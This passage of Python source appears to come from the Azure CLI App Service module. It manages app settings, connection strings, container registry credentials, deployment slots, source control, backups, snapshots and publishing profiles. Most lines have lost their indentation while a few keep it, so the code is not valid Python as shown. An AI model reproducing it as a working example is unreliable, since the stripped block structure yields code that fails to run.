app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
app_settings.properties.pop(setting_name, None)
if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
azure_storage_accounts.properties.pop(custom_id, None)
if slot_cfg_names.azure_storage_config_names and custom_id in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.remove(custom_id)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
return result.properties
def _ssl_context():
    if sys.version_info < (3, 4) or (in_cloud_console() and sys.platform == 'win32'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
slot_cfg_names = slot_cfg_names or []
return [{'name': p,
'value': app_settings[p],
'slotSetting': p in slot_cfg_names} for p in _mask_creds_related_appsettings(app_settings)]
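# Shape of the returned list (values are illustrative):
#   [{'name': 'WEBSITE_NODE_DEFAULT_VERSION', 'value': '10.14', 'slotSetting': False}, ...]
# Settings listed in APPSETTINGS_TO_MASK come back with 'value': None because
# _mask_creds_related_appsettings nulls them out in the source dict first.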
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
settings=None, slot=None, slot_settings=None):
from azure.mgmt.web.models import ConnStringValueTypePair
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
for name_value in settings + slot_settings:
# split at the first '=', connection string should not have '=' in the name
conn_string_name, value = name_value.split('=', 1)
        if value[0] in ["'", '"']:  # strip away the quotes used as separators
value = value[1:-1]
conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value,
type=connection_string_type)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
if slot_settings:
new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or []
slot_cfg_names.connection_string_names += new_slot_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
conn_strings.properties.pop(setting_name, None)
if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names:
slot_cfg_names.connection_string_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
websites_enable_app_service_storage=None, docker_registry_server_password=None,
multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
settings = []
if docker_registry_server_url is not None:
settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
if (not docker_registry_server_user and not docker_registry_server_password and
docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
parsed = urlparse(docker_registry_server_url)
registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
try:
docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
except Exception as ex: # pylint: disable=broad-except
logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed
if docker_registry_server_user is not None:
settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
if docker_registry_server_password is not None:
settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
if docker_custom_image_name is not None:
_add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)
if websites_enable_app_service_storage:
settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long
update_app_settings(cmd, resource_group_name, name, settings, slot)
settings = get_app_settings(cmd, resource_group_name, name, slot)
if multicontainer_config_file and multicontainer_config_type:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
elif multicontainer_config_file or multicontainer_config_type:
        logger.warning('Both --multicontainer-config-file FILE and --multicontainer-config-type TYPE must be specified')
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
slot=slot))
def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
docker_registry_server_password=None, slot=None):
return update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
docker_custom_image_name, docker_registry_server_user, None,
docker_registry_server_password, multicontainer_config_type=None,
multicontainer_config_file=None, slot=slot)
def _get_acr_cred(cli_ctx, registry_name):
from azure.mgmt.containerregistry import ContainerRegistryManagementClient
from azure.cli.core.commands.parameters import get_resources_in_subscription
client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
    result = [item for item in result if item.name.lower() == registry_name.lower()]
    if not result or len(result) > 1:
        raise CLIError("Found no container registry, or more than one, named '{}'.".format(registry_name))
resource_group_name = parse_resource_id(result[0].id)['resource_group']
registry = client.get(resource_group_name, registry_name)
if registry.admin_user_enabled: # pylint: disable=no-member
cred = client.list_credentials(resource_group_name, registry_name)
return cred.username, cred.passwords[0].value
raise CLIError("Failed to retrieve container registry credentials. Please either provide the "
"credentials or run 'az acr update -n {} --admin-enabled true' to enable "
"admin first.".format(registry_name))
def delete_container_settings(cmd, resource_group_name, name, slot=None):
_delete_linux_fx_version(cmd, resource_group_name, name, slot)
delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config, slot))
def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None):
return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot)
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config=None, slot=None):
result = [x for x in settings if x['name'] in CONTAINER_APPSETTING_NAMES]
fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
if fx_version:
added_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME',
'value': fx_version}
result.append(added_image_name)
if show_multicontainer_config:
decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
decoded_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
'value': decoded_value}
result.append(decoded_image_name)
return result
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
for x in [x1 for x1 in settings if x1 in APPSETTINGS_TO_MASK]:
settings[x] = None
return settings
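# Note: the masking above only mutates dict-shaped input (iteration yields key names).
# When a list of {'name': ..., 'value': ...} entries is passed (as from get_app_settings),
# the membership test never matches and the list passes through unchanged; those lists
# have already been masked upstream by _build_app_settings_output.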
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
HostNameBinding = cmd.get_models('HostNameBinding')
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
binding = HostNameBinding(location=webapp.location, site_name=webapp.name)
if slot is None:
return client.web_apps.create_or_update_host_name_binding(resource_group_name, webapp.name, hostname, binding)
return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name, webapp.name, hostname, binding,
slot)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
result = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'list_host_name_bindings', slot))
for r in result:
r.name = r.name.split('/')[-1]
return result
def get_external_ip(cmd, resource_group_name, webapp_name):
SslState = cmd.get_models('SslState')
    # logic here is ported from the portal
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
if webapp.hosting_environment_profile:
address = client.app_service_environments.list_vips(
resource_group_name, webapp.hosting_environment_profile.name)
if address.internal_ip_address:
ip_address = address.internal_ip_address
else:
vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
ip_address = vip.virtual_ip if vip else address.service_ip_address
else:
ip_address = _resolve_hostname_through_dns(webapp.default_host_name)
return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
import socket
return socket.gethostbyname(hostname)
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None):
Site, SiteConfig = cmd.get_models('Site', 'SiteConfig')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, webapp)
if not site:
raise CLIError("'{}' app doesn't exist".format(webapp))
if 'functionapp' in site.kind:
raise CLIError("'{}' is a function app. Please use `az functionapp deployment slot create`.".format(webapp))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
slot_def.site_config = SiteConfig()
poller = client.web_apps.create_or_update_slot(resource_group_name, webapp, slot_def, slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def create_functionapp_slot(cmd, resource_group_name, name, slot, configuration_source=None):
Site = cmd.get_models('Site')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' function app doesn't exist".format(name))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
poller = client.web_apps.create_or_update_slot(resource_group_name, name, slot_def, slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, name, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source=None):
clone_from_prod = configuration_source.lower() == webapp.lower()
site_config = get_site_configs(cmd, resource_group_name, webapp,
None if clone_from_prod else configuration_source)
_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_configuration', slot, site_config)
# slot create doesn't clone over the app-settings and connection-strings, so we do it here
# also make sure slot settings don't get propagated.
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings',
src_slot)
for a in slot_cfg_names.app_setting_names or []:
app_settings.properties.pop(a, None)
connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_connection_strings',
src_slot)
for a in slot_cfg_names.connection_string_names or []:
connection_strings.properties.pop(a, None)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_application_settings',
app_settings.properties, slot, client)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_connection_strings',
connection_strings.properties, slot, client)
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals
manual_integration=None, git_token=None, slot=None, cd_app_type=None,
app_working_dir=None, nodejs_task_runner=None, python_framework=None,
python_version=None, cd_account_create=None, cd_project_url=None, test=None,
slot_swap=None, private_repo_username=None, private_repo_password=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
if cd_project_url:
# Add default values
cd_app_type = 'AspNet' if cd_app_type is None else cd_app_type
python_framework = 'Django' if python_framework is None else python_framework
python_version = 'Python 3.5.3 x86' if python_version is None else python_version
        webapp_list = None if test is None else list_webapp(cmd, resource_group_name)
vsts_provider = VstsContinuousDeliveryProvider()
cd_app_type_details = {
'cd_app_type': cd_app_type,
'app_working_dir': app_working_dir,
'nodejs_task_runner': nodejs_task_runner,
'python_framework': python_framework,
'python_version': python_version
}
try:
status = vsts_provider.setup_continuous_delivery(cmd.cli_ctx, resource_group_name, name, repo_url,
branch, git_token, slot_swap, cd_app_type_details,
cd_project_url, cd_account_create, location, test,
private_repo_username, private_repo_password, webapp_list)
except RuntimeError as ex:
raise CLIError(ex)
logger.warning(status.status_message)
return status
non_vsts_params = [cd_app_type, app_working_dir, nodejs_task_runner, python_framework,
python_version, cd_account_create, test, slot_swap]
if any(non_vsts_params):
        raise CLIError('The following parameters are only valid when cd_project_url is provided: ' +
                       'cd_app_type, app_working_dir, nodejs_task_runner, python_framework, ' +
                       'python_version, cd_account_create, test, slot_swap')
from azure.mgmt.web.models import SiteSourceControl, SourceControl
if git_token:
sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
client.update_source_control('GitHub', sc)
source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
is_manual_integration=manual_integration,
is_mercurial=(repository_type != 'git'))
# SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
for i in range(5):
try:
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'create_or_update_source_control',
slot, source_control)
return LongRunningOperation(cmd.cli_ctx)(poller)
except Exception as ex: # pylint: disable=broad-except
import re
ex = ex_handler_factory(no_throw=True)(ex)
            # for anything other than server errors (50x), re-raise immediately; otherwise retry up to 4 times
if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
raise
logger.warning('retrying %s/4', i + 1)
time.sleep(5) # retry in a moment
def update_git_token(cmd, git_token=None):
'''
Update source control token cached in Azure app service. If no token is provided,
    the command will clear the existing token.
'''
client = web_client_factory(cmd.cli_ctx)
from azure.mgmt.web.models import SourceControl
sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=git_token or '')
return client.update_source_control('GitHub', sc)
def show_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
SiteConfigResource = cmd.get_models('SiteConfigResource')
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
site_config = SiteConfigResource(location=location)
site_config.scm_type = 'LocalGit'
if slot is None:
client.web_apps.create_or_update_configuration(resource_group_name, name, site_config)
else:
client.web_apps.create_or_update_configuration_slot(resource_group_name, name,
site_config, slot)
return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot)
except CloudError as ex: # Because of bad spec, sdk throws on 200. We capture it here
if ex.status_code not in [200, 204]:
raise ex
def list_app_service_plans(cmd, resource_group_name=None):
client = web_client_factory(cmd.cli_ctx)
if resource_group_name is None:
plans = list(client.app_service_plans.list(detailed=True)) # enables querying "numberOfSites"
else:
plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
for plan in plans:
# prune a few useless fields
del plan.geo_region
del plan.subscription
return plans
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, per_site_scaling=False,
app_service_environment=None, sku='B1', number_of_workers=None, location=None,
tags=None, no_wait=False):
HostingEnvironmentProfile, SkuDescription, AppServicePlan = cmd.get_models(
'HostingEnvironmentProfile', 'SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
_validate_asp_sku(app_service_environment, sku)
if is_linux and hyper_v:
raise CLIError('usage error: --is-linux | --hyper-v')
client = web_client_factory(cmd.cli_ctx)
if app_service_environment:
if hyper_v:
            raise CLIError('Windows containers are not yet supported in an App Service Environment')
ase_id = _validate_app_service_environment_id(cmd.cli_ctx, app_service_environment, resource_group_name)
ase_def = HostingEnvironmentProfile(id=ase_id)
ase_list = client.app_service_environments.list()
ase_found = False
for ase in ase_list:
if ase.id.lower() == ase_id.lower():
location = ase.location
ase_found = True
break
if not ase_found:
raise CLIError("App service environment '{}' not found in subscription.".format(ase_id))
else: # Non-ASE
ase_def = None
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
# the api is odd on parameter naming, have to live with it for now
sku_def = SkuDescription(tier=get_sku_name(sku), name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name,
per_site_scaling=per_site_scaling, hosting_environment_profile=ase_def)
return sdk_no_wait(no_wait, client.app_service_plans.create_or_update, name=name,
resource_group_name=resource_group_name, app_service_plan=plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None):
if number_of_workers is None and sku is None:
        logger.warning('Nothing was updated. Specify --sku and/or --number-of-workers.')
sku_def = instance.sku
if sku is not None:
sku = _normalize_sku(sku)
sku_def.tier = get_sku_name(sku)
sku_def.name = sku
if number_of_workers is not None:
sku_def.capacity = number_of_workers
instance.sku = sku_def
return instance
def update_functionapp_app_service_plan(cmd, instance, sku=None, number_of_workers=None, max_burst=None):
instance = update_app_service_plan(instance, sku, number_of_workers)
if max_burst is not None:
if not is_plan_elastic_premium(cmd, instance):
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
instance.maximum_elastic_worker_count = max_burst
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-instances',
number_of_workers, min_val=0, max_val=20)
return update_app_service_plan(instance, sku, number_of_workers)
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
raise CLIError('Backup configuration not found')
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups',
slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
db_name=None, db_type=None,
db_connection_string=None, backup_name=None, slot=None):
BackupRequest = cmd.get_models('BackupRequest')
client = web_client_factory(cmd.cli_ctx)
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_request = BackupRequest(backup_name=backup_name,
storage_account_url=storage_account_url, databases=db_setting)
if slot:
return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot)
return client.web_apps.backup(resource_group_name, webapp_name, backup_request)
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
frequency=None, keep_at_least_one_backup=None,
retention_period_in_days=None, db_name=None,
db_connection_string=None, db_type=None, backup_name=None, slot=None):
DefaultErrorResponseException, BackupSchedule, BackupRequest = cmd.get_models(
'DefaultErrorResponseException', 'BackupSchedule', 'BackupRequest')
configuration = None
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
if not backup_name:
backup_name = '{0}_{1}'.format(webapp_name, datetime.datetime.utcnow().strftime('%Y%m%d%H%M'))
try:
configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except DefaultErrorResponseException:
# No configuration set yet
if not all([storage_account_url, frequency, retention_period_in_days,
keep_at_least_one_backup]):
raise CLIError('No backup configuration found. A configuration must be created. ' +
'Usage: --container-url URL --frequency TIME --retention DAYS ' +
'--retain-one TRUE/FALSE')
# If arguments were not specified, use the values in the current backup schedule
if storage_account_url is None:
storage_account_url = configuration.storage_account_url
if retention_period_in_days is None:
retention_period_in_days = configuration.backup_schedule.retention_period_in_days
if keep_at_least_one_backup is None:
keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
else:
keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
if frequency:
# Parse schedule frequency
frequency_num, frequency_unit = _parse_frequency(cmd, frequency)
else:
frequency_num = configuration.backup_schedule.frequency_interval
frequency_unit = configuration.backup_schedule.frequency_unit
if configuration and configuration.databases:
db = configuration.databases[0]
db_type = db_type or db.database_type
db_name = db_name or db.name
db_connection_string = db_connection_string or db.connection_string
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
keep_at_least_one_backup=keep_at_least_one_backup,
retention_period_in_days=retention_period_in_days)
backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
enabled=True, storage_account_url=storage_account_url,
databases=db_setting)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
db_name=None, db_type=None, db_connection_string=None,
target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
RestoreRequest = cmd.get_models('RestoreRequest')
client = web_client_factory(cmd.cli_ctx)
storage_blob_name = backup_name
if not storage_blob_name.lower().endswith('.zip'):
storage_blob_name += '.zip'
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
restore_request = RestoreRequest(storage_account_url=storage_account_url,
blob_name=storage_blob_name, overwrite=overwrite,
site_name=target_name, databases=db_setting,
ignore_conflicting_host_names=ignore_hostname_conflict)
if slot:
return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot)
return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request)
def list_snapshots(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots',
slot)
def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False, # pylint: disable=redefined-outer-name
source_resource_group=None, source_name=None, source_slot=None):
from azure.cli.core.commands.client_factory import get_subscription_id
SnapshotRecoverySource, SnapshotRestoreRequest = cmd.get_models('SnapshotRecoverySource', 'SnapshotRestoreRequest')
client = web_client_factory(cmd.cli_ctx)
recover_config = not restore_content_only
if all([source_resource_group, source_name]):
# Restore from source app to target app
sub_id = get_subscription_id(cmd.cli_ctx)
source_id = "/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group + \
"/providers/Microsoft.Web/sites/" + source_name
if source_slot:
source_id = source_id + "/slots/" + source_slot
source = SnapshotRecoverySource(id=source_id)
request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source,
recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
if any([source_resource_group, source_name]):
raise CLIError('usage error: --source-resource-group and --source-name must both be specified if one is used')
# Overwrite app with its own snapshot
request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time, recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
# pylint: disable=inconsistent-return-statements
def _create_db_setting(cmd, db_name, db_type, db_connection_string):
DatabaseBackupSetting = cmd.get_models('DatabaseBackupSetting')
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)]
if any([db_name, db_type, db_connection_string]):
raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
def _parse_frequency(cmd, frequency):
FrequencyUnit = cmd.get_models('FrequencyUnit')
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise CLIError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise CLIError('Frequency must start with a number')
    if frequency_num < 0:
        raise CLIError('Frequency must not be negative')
return frequency_num, frequency_unit
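# Examples of accepted frequency strings:
#   '7d'  -> (7, FrequencyUnit.day)
#   '12h' -> (12, FrequencyUnit.hour)
# Anything not ending in 'd'/'h', or not starting with an integer, raises CLIError.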
def _get_location_from_resource_group(cli_ctx, resource_group_name):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
group = client.resource_groups.get(resource_group_name)
return group.location
def _get_location_from_webapp(client, resource_group_name, webapp):
webapp = client.web_apps.get(resource_group_name, webapp)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp))
return webapp.location
def _get_deleted_apps_locations(cli_ctx):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
web_provider = client.providers.get('Microsoft.Web')
del_sites_resource = next((x for x in web_provider.resource_types if x.resource_type == 'deletedSites'), None)
if del_sites_resource:
return del_sites_resource.locations
return []
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
user = client.get_publishing_user()
result = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
parsed = urlparse(result.repo_url)
return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
parsed.netloc, name)
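# The resulting URL has the form (host name is illustrative):
#   https://<publishing-user>@<app>.scm.azurewebsites.net/<app>.git
# i.e. the SCM host from the site's source control record, with the publishing user
# injected and the app name appended as the git repository path.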
def _get_scm_url(cmd, resource_group_name, name, slot=None):
from azure.mgmt.web.models import HostType
webapp = show_webapp(cmd, resource_group_name, name, slot=slot)
for host in webapp.host_name_ssl_states or []:
if host.host_type == HostType.repository:
return "https://{}".format(host.name)
# this should not happen, but throw anyway
raise ValueError('Failed to retrieve Scm Uri')
def get_publishing_user(cmd):
client = web_client_factory(cmd.cli_ctx)
return client.get_publishing_user()
def set_deployment_user(cmd, user_name, password=None):
'''
    Update deployment credentials. (Note: all webapps in your subscription will be impacted.)
'''
User = cmd.get_models('User')
client = web_client_factory(cmd.cli_ctx)
user = User(publishing_user_name=user_name)
if password is None:
try:
password = prompt_pass(msg='Password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
user.publishing_password = password
return client.update_publishing_user(user)
def list_publishing_credentials(cmd, resource_group_name, name, slot=None):
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_credentials', slot)
return content.result()
def list_publish_profiles(cmd, resource_group_name, name, slot=None):
import xmltodict
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_profile_xml_with_secrets', slot)
full_xml = ''
for f in content:
full_xml += f.decode()
profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
converted = []
for profile in profiles:
new = {}
for key in profile:
# strip the leading '@' xmltodict put in for attributes
new[key.lstrip('@')] = profile[key]
converted.append(new)
return converted
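# Each converted entry is a flat dict of the XML attributes of one <publishProfile>
# element, e.g. (values are illustrative):
#   {'profileName': 'my-app - Web Deploy', 'publishMethod': 'MSDeploy',
#    'publishUrl': '...', 'userName': '...', 'userPWD': '...'}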
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
settings = []
settings.append("DOCKER_ENABLE_CI=" + enable)
update_app_settings(cmd, resource_group_name, name, settings, slot)
return show_container_cd_url(cmd, resource_group_name, name, slot)
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
docker_enabled = False
for setting in settings:
if setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true':
docker_enabled = True
